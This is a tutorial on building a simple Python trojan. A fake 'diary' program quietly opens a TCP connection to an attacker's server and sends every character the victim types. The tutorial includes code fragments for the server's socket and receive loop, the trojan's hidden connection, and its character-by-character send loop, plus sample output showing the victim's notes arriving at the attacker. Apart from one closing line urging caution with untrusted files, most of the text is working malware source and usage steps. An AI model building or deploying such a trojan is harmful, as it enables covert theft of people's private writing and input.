Our trojan is implemented in the file trojan.py. It tries to collect data from the victim disquised as a common diary and send them secretly to the server of the attacker. The server is implemented in the file server.py. We should be able to see all notes written into the diary without any knowledge of the victim.
The first thing that the attacker must do is to set a server that collects data sent by the victim. That's why we setup a running server on our computer by running ./server.py. You should see the following text:
DEBUG:user:Server was successfully initialized.
In the second console run the trojan (diary) as the victim with the command ./trojan.py. On the attacker's console we should immediately see the following text:
Connection with trojan established from ('127.0.0.1', 46682)
That means that our client has made a successful connection to our server. Type a few lines of notes into the diary. We can observe that all notes are being shown to the attacker as well.
Hello, this is your diary. You can type here your notes:
Hello diary,
let me tell you a secret.
...
DEBUG:user:Server was successfully initialized.
Connection with trojan established from ('127.0.0.1', 46682)
INFO:user:b'Hello diary,\n'
INFO:user:b'let me tell you a secret.\n'
...
Creation of basic trojan is very simple process as it is described below and anyone can do it just with the basic knowledge of programming and understandment of operating systems. That's why we should be always cautious when we execute any uncommon or not trusted file.
-
Firstly, we create our server that should collect the data obtained from trojan executed by the victim. The server will listen on the specific port that must be the same as is specified in our trojan. In this example will be both the server and trojan executed on the same computer, but the server might be remote and located anywhere in the world.
server = Server(27000)
The communication is realized via TCP protocol specified by
socket.SOCK_STREAM(To learn more about network protocols see the guide to network communication.self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-
Then we must initialize the server by binding it to the specified port.
server.initialize()
-
The most important part is the connection with the victim. This is implemented in the function collect_data provided by the server. It waits for the connection initiated by the trojan after its execution on the victim's system. After that it just constantly checks whether the client has sent any data. If so, they are logged into the console so that the attacker can see them. If the sent data are "empty", the client has closed the connection.
while True: data = connection.recv(1024) if not data: break logging.debug(data)
-
Firstly, we must create our trojan. The service requires a name of the host (server) and the specified port for the communication. Host named
localhostmeans that the server is listening on the same system as our client.trojan = Trojan('localhost', 27000)
-
Now we try to connect to the server. This connection should remain hidden to the victim. The logging message is presented just so we can spot any errors in our example.
try: self.socket.connect((self.host, self.port)) except socket.error: logging.debug('Trojan could not connect to the server.') return
-
Then the trojan tries to act like a harmless program by greeting the victim.
print('Hello, this is your diary. You can type your notes here:')
-
As the victim types his or her notes into the diary (
stdin), each line is sent to the attacker's server. We expect the data to be encoded as UTF-8 and because the communication interface expects binary data, we must transform the obtained strings into bytes.while True: character = sys.stdin.read(1) self.socket.send(bytes(character, 'utf-8'))